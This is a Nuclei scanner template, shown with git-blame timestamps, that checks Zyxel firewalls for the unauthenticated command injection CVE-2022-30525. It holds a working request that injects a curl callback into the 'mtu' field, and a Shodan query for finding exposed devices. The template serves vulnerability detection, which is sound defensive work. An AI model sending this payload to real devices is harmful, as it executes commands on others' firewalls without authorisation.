2022-05-13 02:52:42 +00:00
id : CVE-2022-30525
info :
2022-05-13 08:46:09 +00:00
name : Zyxel Firewall - Unauthenticated RCE
author : h1ei1,prajiteshsingh
2022-05-13 02:52:42 +00:00
severity : critical
2022-05-13 08:46:09 +00:00
description : |
The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
2022-05-13 02:52:42 +00:00
reference :
2022-05-13 08:46:09 +00:00
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
2022-05-17 09:18:12 +00:00
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
2022-05-14 23:01:56 +00:00
metadata :
shodan-query : title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
2022-05-13 08:46:09 +00:00
tags : rce,zyxel,cve,cve2022,firewall,unauth
2022-05-13 02:52:42 +00:00
requests :
- raw :
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2022-05-13 08:46:09 +00:00
{"command" : "setWanPortSt" , "proto" : "dhcp" , "port" : "4" , "vlan_tagged" : "1" , "vlanid" : "5" , "mtu" : "; curl {{interactsh-url}};" , "data" : "hi" }
2022-05-13 02:52:42 +00:00
2022-05-13 08:46:09 +00:00
matchers-condition : and
2022-05-13 02:52:42 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
2022-05-13 08:46:09 +00:00
- "http"
- type : status
status :
- 500
